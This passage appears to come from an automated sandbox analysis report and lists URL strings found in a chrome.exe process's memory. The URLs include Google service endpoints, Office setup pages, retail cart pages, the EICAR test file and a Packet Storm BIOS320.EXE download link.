      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onenote.com
      Source: chrome.exe, 00000008.00000002.2141993291.000009B401A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143549040.000009B4020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143702868.000009B4020DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
      Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
      Source: chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1689043206&target=OPTIMIZATION_TARGET_VIS
      Source: chrome.exe, 00000008.00000002.2141993291.000009B401A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143549040.000009B4020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1110933299.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137867691.000009B40114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1916097075.000009B4022A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1691042511&target=OPTIMIZATION_TARGET_NEW
      Source: chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1715213284&target=OPTIMIZATION_TARGET_TEX
      Source: chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870342&target=OPTIMIZATION_TARGET_CLI
      Source: chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870385&target=OPTIMIZATION_TARGET_GEO
      Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870420&target=OPTIMIZATION_TARGET_NOT
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079789&target=OPTIMIZATION_TARGET_CLI
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079821&target=OPTIMIZATION_TARGET_GEO
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079854&target=OPTIMIZATION_TARGET_NOT
      Source: chrome.exe, 00000008.00000002.2142398431.000009B401C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728918159&target=OPTIMIZATION_TARGET_GEO
      Source: chrome.exe, 00000008.00000002.2142398431.000009B401C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130054872.000009B40015C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728918182&target=OPTIMIZATION_TARGET_NOT
      Source: chrome.exe, 00000008.00000003.1161131124.000009B402294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143908946.000009B402294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137770733.000009B401130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143702868.000009B4020DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1729004809&target=OPTIMIZATION_TARGET_CLI
      Source: chrome.exe, 00000008.00000002.2140494319.000009B401550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143702868.000009B4020DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1729888136&target=OPTIMIZATION_TARGET_TEX
      Source: chrome.exe, 00000008.00000002.2141993291.000009B401A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1629891828.000009B40135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143549040.000009B4020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139229508.000009B401364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2142398431.000009B401C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=2311071436&target=OPTIMIZATION_TARGET_WEB
      Source: chrome.exe, 00000008.00000002.2142398431.000009B401C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042095&target=OPTIMIZATION_TARGET_S
      Source: chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com
      Source: chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/
      Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
      Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
      Source: chrome.exe, 00000008.00000003.970199396.000009B4011D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134978060.000009B400C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poshmark.com/bundles/shop
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
      Source: chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
      Source: chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recoveringlib.blogspot.com/
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rest.co.il
      Source: chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
      Source: chrome.exe, 00000008.00000002.2129590881.000009B400094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129871752.000009B400110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
      Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure-oldnavy.gap.com/shopping-bag
      Source: chrome.exe, 00000008.00000002.2136147812.000009B400E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.newegg.com/shop/cart
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
      Source: chrome.exe, 00000008.00000002.2132840549.000009B40087B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1002628944.000009B4017BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/container/13539;99030;10307;iframe/?ftXRef=&ftXValue=&ftXType=&ftX
      Source: chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046293799.000009B4020E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com
      Source: chrome.exe, 00000008.00000002.2130491850.000009B400248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136003376.000009B400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/
      Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137770733.000009B401130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setup
      Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046293799.000009B4020E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
      Source: chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129590881.000009B400094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046293799.000009B4020E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
      Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup
      Source: chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
      Source: chrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942427852.000009B0005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942528995.000009B0005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942742503.000009B0005CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com
      Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
      Source: chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.lululemon.com/shop/mybag
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com
      Source: chrome.exe, 00000008.00000002.2135364167.000009B400D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140833525.000009B4016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134871796.000009B400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skype.com
      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985730131.000009B4019E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/cart/
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.usps.com/store/cart/cart.jsp
      Source: chrome.exe, 00000008.00000002.2130945695.000009B400364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134978060.000009B400C8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
      Source: chrome.exe, 00000008.00000002.2127856175.000009B00006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
      Source: chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
      Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
      Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tpc.googlesyndication.com/sodar/Enqz_20U.html
      Source: chrome.exe, 00000008.00000002.2132840549.000009B40087B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1002628944.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136680471.000009B400F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com/cm/i
      Source: chrome.exe, 00000008.00000002.2132840549.000009B40087B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1002628944.000009B4017BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc
      Source: chrome.exe, 00000008.00000002.2143295182.000009B401FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://update.googleapis.com/service/update2/json
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://update.googleapis.com/service/update2/json?cup2key=14:v_5pxGLPvaMnDZ_4t2nAW0oEEw2zTz0k_MDyhB
      Source: chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com
      Source: chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com/
      Source: chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.academy.com/shop/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.acehardware.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ae.com/us/en/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.altardstate.com/cart/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anthropologie.com/cart
